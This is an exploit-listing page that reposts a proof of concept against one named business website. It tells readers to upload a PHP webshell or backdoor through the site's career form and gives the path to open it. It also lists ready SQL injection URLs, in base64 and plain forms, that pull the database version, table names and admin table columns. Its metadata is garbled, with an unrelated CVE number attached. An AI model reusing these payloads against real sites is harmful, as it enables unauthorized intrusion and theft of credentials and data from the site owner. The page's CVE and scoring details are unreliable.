Advertisement






Sujal Enterprise FIle Upload Vulnerability

CVE Category Price Severity
CVE-2021-41773 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-04-09
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040070

Below is a copy:

Sujal Enterprise FIle Upload Vulnerability
===============================================================
#  Title : Sujal Enterprise FIle Upload Vulnerability
#  Author : Dj3Bb4rAn0n (bassem)      FB/djebbar.bassem.16
#  Date : /08/04/2019
#  Home : Annaba  ( Algeria )
#  Tested on : Linux ( Backbox ) 
#  Vendor : Sujal Enterprise
#  Dork : 
===============================================================

#   PoC  : 
     -----
---------------------------------------------------------------

#  [  1  ]  File Upload Vulnerability 

#  Upload Your melcious php backdoor or webshell  from this link :      http://sujalenterprise.in/career.php

#  To display the webshell use this link  :   http://sujalenterprise.in/img/career/[  WEBSHELL NAME  ]

-----------------------------------------------------------------

#  [  2  ]  BASE64 xpath Sql injection Vulnerability  

#  Search for any injection point from google using this dork :     site:http://sujalenterprise.in .php?id 

#  Use single quoat as a payload [ ' ]

#  Version : http://sujalenterprise.in/product_details.php?id=NjQgICBhbmQgZXh0cmFjdHZhbHVlKDB4MGEsY29uY2F0KDB4MGEsKHNlbGVjdCB2ZXJzaW9uKCkpKSk=
                 : http://sujalenterprise.in/product_details.php?id=64   and extractvalue(0x0a,concat(0x0a,(select version())))

#  Tables :  http://sujalenterprise.in/product_details.php?id=NjQgICAgYW5kIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLChzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSkp
# http://sujalenterprise.in/product_details.php?id=64    and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit [  Put limit ],1)))

# Columns  :   http://sujalenterprise.in/product_details.php?id=NjQgICAgIGFuZCBleHRyYWN0dmFsdWUoMHgwYSxjb25jYXQoMHgwYSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPURBVEFCQVNFKCkgYW5kIHRhYmxlX25hbWU9MHg3NDYyNmM1ZjYxNjQ2ZDY5NmUgbGltaXQgMSwxKSkp
# http://sujalenterprise.in/product_details.php?id=64     and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x74626c5f61646d696e limit [  PUt Limit ],1))) 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum